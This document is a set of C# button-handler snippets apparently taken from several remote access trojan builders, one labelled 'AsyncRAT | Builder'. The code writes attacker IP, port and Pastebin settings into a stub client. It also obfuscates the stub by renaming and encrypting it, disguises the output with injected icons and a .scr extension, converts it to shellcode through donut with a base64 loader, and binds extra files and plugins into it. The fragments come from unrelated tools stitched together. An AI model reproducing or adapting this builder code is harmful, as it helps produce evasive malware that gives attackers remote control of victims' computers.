private void BuildButton_Click(object sender, RoutedEventArgs e) { string errorMsg = ""; if (string.IsNullOrWhiteSpace(ipTextBox.Text)) { errorMsg = "IP cannot be empty."; } else if (string.IsNullOrWhiteSpace(portTextBox.Text)) { errorMsg = "Port cannot be empty."; } else if (generateStubCheckbox.IsChecked == true && string.IsNullOrWhiteSpace(stubEncryptionPasswordTextBox.Text)) { errorMsg = "Encryption password cannot be empty."; } if (errorMsg.Length > 0) { MessageBox.Show(errorMsg, "Error", MessageBoxButton.OK, MessageBoxImage.Error); return; } SaveFileDialog dialog = new SaveFileDialog() { Filter = "Executable (.exe)|*.exe|Screensaver (.scr)|*.scr" }; // dialog.Filter = "Exe Files (.exe)|*.exe; if (dialog.ShowDialog() == true) { if (generateStubCheckbox.IsChecked == true) { if (!File.Exists(IconFilePath)) { IconFilePath = null; } ZombieBuilder.Build(new ClientSettings(ipTextBox.Text, int.Parse(portTextBox.Text)), "temp.exe"); StubCompiler.Compile("temp.exe", stubEncryptionPasswordTextBox.Text, dialog.FileName, IconFilePath); File.Delete("temp.exe"); } else { ZombieBuilder.Build(new ClientSettings(ipTextBox.Text, int.Parse(portTextBox.Text)), dialog.FileName); if (File.Exists(IconFilePath)) { IconInjector.ChangeIcon(dialog.FileName, IconFilePath); } } } }
private void slCbtn7_Click_1(object sender, EventArgs e) { if (!string.IsNullOrEmpty(slcTextBox5.Text) && !string.IsNullOrEmpty(slcTextBox6.Text)) { IconInjector.InjectIcon(slcTextBox6.Text, slcTextBox5.Text); MessageBox.Show("Icon changed!", "", MessageBoxButtons.OK, MessageBoxIcon.Information); } else { MessageBox.Show("Invalid information!", "Wrong input", MessageBoxButtons.OK, MessageBoxIcon.Error); } }
private static void InjectIcon(string pathToTargetExe, SingleIcon icon) { // Save icon to a temp file string tempIcoPath = Path.GetTempFileName(); icon.Save(tempIcoPath); // Magically inject icon into the target exe IconInjector.InjectIcon(pathToTargetExe, tempIcoPath); // Delete temp ico file File.Delete(tempIcoPath); }
private static void ChangeIconFromBitmap(string pathToTargetExe, Bitmap bmpIcon) { if (bmpIcon.PixelFormat != System.Drawing.Imaging.PixelFormat.Format32bppArgb || bmpIcon.Width > 256 || bmpIcon.Height > 256) { bmpIcon = FixIcon(bmpIcon); } // Create icon and save it into temp file MultiIcon mIco = new MultiIcon(); SingleIcon sIco = mIco.Add("main"); sIco.CreateFrom(bmpIcon, IconOutputFormat.Vista); string tempIcoPath = System.IO.Path.GetTempFileName(); sIco.Save(tempIcoPath); // Magically inject icon into target exe IconInjector.InjectIcon(pathToTargetExe, tempIcoPath); // Delete temp ico file System.IO.File.Delete(tempIcoPath); }
private async void BtnBuild_Click(object sender, EventArgs e) { if (!chkPastebin.Checked && listBoxIP.Items.Count == 0 || listBoxPort.Items.Count == 0) { return; } if (checkBox1.Checked) { if (string.IsNullOrWhiteSpace(textFilename.Text) || string.IsNullOrWhiteSpace(comboBoxFolder.Text)) { return; } if (!textFilename.Text.EndsWith("exe")) { textFilename.Text += ".exe"; } } if (string.IsNullOrWhiteSpace(txtMutex.Text)) { txtMutex.Text = getRandomCharacters(); } if (chkPastebin.Checked && string.IsNullOrWhiteSpace(txtPastebin.Text)) { return; } ModuleDefMD asmDef = null; try { using (asmDef = ModuleDefMD.Load(@"Stub/Stub.exe")) using (SaveFileDialog saveFileDialog1 = new SaveFileDialog()) { saveFileDialog1.Filter = ".exe (*.exe)|*.exe"; saveFileDialog1.InitialDirectory = Application.StartupPath; saveFileDialog1.OverwritePrompt = false; saveFileDialog1.FileName = "Client"; if (saveFileDialog1.ShowDialog() == DialogResult.OK) { btnBuild.Enabled = false; WriteSettings(asmDef); if (chkObfu.Checked) { //EncryptString.DoEncrypt(asmDef); await Task.Run(() => { Renaming.DoRenaming(asmDef); }); } asmDef.Write(saveFileDialog1.FileName); asmDef.Dispose(); if (btnAssembly.Checked) { WriteAssembly(saveFileDialog1.FileName); } if (chkIcon.Checked && !string.IsNullOrEmpty(txtIcon.Text)) { IconInjector.InjectIcon(saveFileDialog1.FileName, txtIcon.Text); } MessageBox.Show("Done!", "AsyncRAT | Builder", MessageBoxButtons.OK, MessageBoxIcon.Information); SaveSettings(); this.Close(); } } } catch (Exception ex) { MessageBox.Show(ex.Message, "AsyncRAT | Builder", MessageBoxButtons.OK, MessageBoxIcon.Error); asmDef?.Dispose(); btnBuild.Enabled = true; } }
private void btnShellcode_Click(object sender, EventArgs e) { if (!chkPaste_bin.Checked && listBoxIP.Items.Count == 0 || listBoxPort.Items.Count == 0) { return; } if (checkBox1.Checked) { if (string.IsNullOrWhiteSpace(textFilename.Text) || string.IsNullOrWhiteSpace(comboBoxFolder.Text)) { return; } if (!textFilename.Text.EndsWith("exe")) { textFilename.Text += ".exe"; } } if (string.IsNullOrWhiteSpace(txtMutex.Text)) { txtMutex.Text = getRandomCharacters(); } if (chkPaste_bin.Checked && string.IsNullOrWhiteSpace(txtPaste_bin.Text)) { return; } ModuleDefMD asmDef = null; try { using (asmDef = ModuleDefMD.Load(@"Stub/Client.exe")) { string Temppath = Path.Combine(Application.StartupPath, @"Stub\tempClient.exe"); if (File.Exists(Temppath)) { File.Delete(Temppath); } File.Copy(Path.Combine(Application.StartupPath, @"Stub\Client.exe"), Temppath); btnShellcode.Enabled = false; btnBuild.Enabled = false; WriteSettings(asmDef, Temppath); asmDef.Write(Temppath); asmDef.Dispose(); if (btnAssembly.Checked) { WriteAssembly(Temppath); } if (chkIcon.Checked && !string.IsNullOrEmpty(txtIcon.Text)) { IconInjector.InjectIcon(Temppath, txtIcon.Text); } string savepath = ""; using (SaveFileDialog saveFileDialog1 = new SaveFileDialog()) { saveFileDialog1.Filter = ".bin (*.bin)|*.bin"; saveFileDialog1.InitialDirectory = Application.StartupPath; saveFileDialog1.OverwritePrompt = false; saveFileDialog1.FileName = "Client"; if (saveFileDialog1.ShowDialog() == DialogResult.OK) { savepath = saveFileDialog1.FileName; } } string Donutpath = Path.Combine(Application.StartupPath, @"Plugins\donut.exe"); if (!File.Exists(Donutpath)) { File.WriteAllBytes(Donutpath, Properties.Resources.donut); } Process Process = new Process(); Process.StartInfo.FileName = Donutpath; Process.StartInfo.CreateNoWindow = true; Process.StartInfo.Arguments = "-f " + Temppath + " -o " + savepath; Process.Start(); Process.WaitForExit(); Process.Close(); if (File.Exists(savepath)) { File.WriteAllText(savepath + "loader.cs", Properties.Resources.ShellcodeLoader.Replace("%qwqdanchun%", Convert.ToBase64String(File.ReadAllBytes(savepath)))); File.WriteAllText(savepath + ".b64", Convert.ToBase64String(File.ReadAllBytes(savepath))); } File.Delete(Temppath); File.Delete(Donutpath); MessageBox.Show("Done!", "Builder", MessageBoxButtons.OK, MessageBoxIcon.Information); SaveSettings(); this.Close(); } } catch (Exception ex) { MessageBox.Show(ex.Message, "Builder", MessageBoxButtons.OK, MessageBoxIcon.Error); asmDef?.Dispose(); btnBuild.Enabled = true; } }
private void BtnBuild_Click(object sender, EventArgs e) { if (listBoxIP.Items.Count == 0 || listBoxPort.Items.Count == 0) { return; } if (checkBox1.Checked) { if (string.IsNullOrWhiteSpace(textFilename.Text) || string.IsNullOrWhiteSpace(comboBoxFolder.Text)) { return; } if (!textFilename.Text.EndsWith("exe")) { textFilename.Text += ".exe"; } } if (string.IsNullOrWhiteSpace(txtMutex.Text)) { txtMutex.Text = Guid.NewGuid().ToString().Substring(20); } if (chkPastebin.Checked && string.IsNullOrWhiteSpace(txtPastebin.Text)) { return; } try { using (AssemblyDefinition asmDef = AssemblyDefinition.ReadAssembly(@"Stub/Stub.exe")) { WriteSettings(asmDef); Renamer r = new Renamer(asmDef); if (!r.Perform()) { throw new Exception("renaming failed"); } using (SaveFileDialog saveFileDialog1 = new SaveFileDialog()) { saveFileDialog1.Filter = ".exe (*.exe)|*.exe"; saveFileDialog1.InitialDirectory = Application.StartupPath; saveFileDialog1.OverwritePrompt = false; saveFileDialog1.FileName = "Client"; if (saveFileDialog1.ShowDialog() == DialogResult.OK) { r.AsmDef.Write(saveFileDialog1.FileName); r.AsmDef.Dispose(); if (btnAssembly.Checked) { WriteAssembly(saveFileDialog1.FileName); } if (chkIcon.Checked && !string.IsNullOrEmpty(txtIcon.Text)) { IconInjector.InjectIcon(saveFileDialog1.FileName, txtIcon.Text); } MessageBox.Show("Done!", "AsyncRAT | Builder", MessageBoxButtons.OK, MessageBoxIcon.Information); SaveSettings(); this.Close(); } } } } catch (Exception ex) { MessageBox.Show(ex.Message, "AsyncRAT | Builder", MessageBoxButtons.OK, MessageBoxIcon.Error); } }
void Client_DataReceived(object sender, NWR_Client.DataReceivedEventArgs e) { Invoke((MethodInvoker) delegate { PacketReader r = e.Reader; switch ((Header)e.Header) { case Header.BUILD: int len = r.ReadInt32(); byte[] b = r.ReadBytes(len); string binderResName = r.ReadString(); string pluginResName = r.ReadString(); MemoryStream ms = new MemoryStream(b); AssemblyDefinition asm = AssemblyDefinition.ReadAssembly(ms); ms.Close(); ms.Dispose(); len = 0; Invoke((MethodInvoker) delegate { len = lstBinder.Items.Count; }); if (len > 0) { ms = new MemoryStream(); BinaryWriter wr = new BinaryWriter(ms); for (int i = 0; i < lstBinder.Items.Count; i++) { Invoke((MethodInvoker) delegate { string name = lstBinder.Items[i].Text; string fileName = lstBinder.Items[i].SubItems[1].Text; byte[] file = File.ReadAllBytes(fileName); wr.Write(name); wr.Write(file.Length); wr.Write(file); }); } wr.Close(); byte[] bData = Encryption.Encrypt(ms.ToArray(), false); EmbeddedResource bRes = new EmbeddedResource(binderResName, ManifestResourceAttributes.Private, bData); asm.MainModule.Resources.Add(bRes); ms.Dispose(); } Invoke((MethodInvoker) delegate { len = lstPlugins.CheckedItems.Count; }); if (len > 0) { ms = new MemoryStream(); BinaryWriter br = new BinaryWriter(ms); Invoke((MethodInvoker) delegate { for (int i = 0; i < lstPlugins.CheckedItems.Count; i++) { byte[] plugin = GlobalProperties.RawPlugins[(Guid)lstPlugins.CheckedItems[i].Tag]; plugin = Encryption.Encrypt(plugin, false); br.Write(plugin.Length); br.Write(plugin); } }); br.Close(); byte[] data = Encryption.Encrypt(ms.ToArray(), false); EmbeddedResource res = new EmbeddedResource(pluginResName, ManifestResourceAttributes.Private, data); asm.MainModule.Resources.Add(res); } asm.Write(saveLoc); //if (!xCrypt.Checked) //{ if (GlobalProperties.BuildAssembly != null) { if (!string.IsNullOrEmpty(GlobalProperties.BuildAssembly.IconPath)) { if (GlobalProperties.BuildAssembly.IconPath.ToLower().EndsWith(".exe")) { try { IconExtractor iconEx = new IconExtractor(GlobalProperties.BuildAssembly.IconPath); Icon icon = null; if (iconEx.IconCount > 1) { SortedList <int, Icon> icons = new SortedList <int, Icon>(); for (int i = 0; i < iconEx.IconCount; i++) { icons.Add(i, iconEx.GetIcon(i)); } IconSelecterDialog isd = new IconSelecterDialog(icons); if (isd.ShowDialog() != System.Windows.Forms.DialogResult.OK) { icon = iconEx.GetIcon(0); } isd.Dispose(); icon = iconEx.GetIcon(isd.Selected); } else if (iconEx.IconCount == 1) { icon = iconEx.GetIcon(0); } else { throw new Exception(); } FileStream fs = new FileStream("Icon.ico", FileMode.Create); icon.Save(fs); fs.Close(); } catch { } } else if (GlobalProperties.BuildAssembly.IconPath.ToLower().EndsWith(".ico")) { File.Copy(GlobalProperties.BuildAssembly.IconPath, "Icon.ico"); } if (File.Exists("Icon.ico")) { IconInjector.InjectIcon("Icon.ico", saveLoc); File.Delete("Icon.ico"); } } } //} //else //{ // byte[] file = File.ReadAllBytes(saveLoc); // File.Delete(saveLoc); // BuildCry(file, saveLoc); //} MessageBox.Show("Build Successful!", "", MessageBoxButtons.OK, MessageBoxIcon.Information); break; } }); }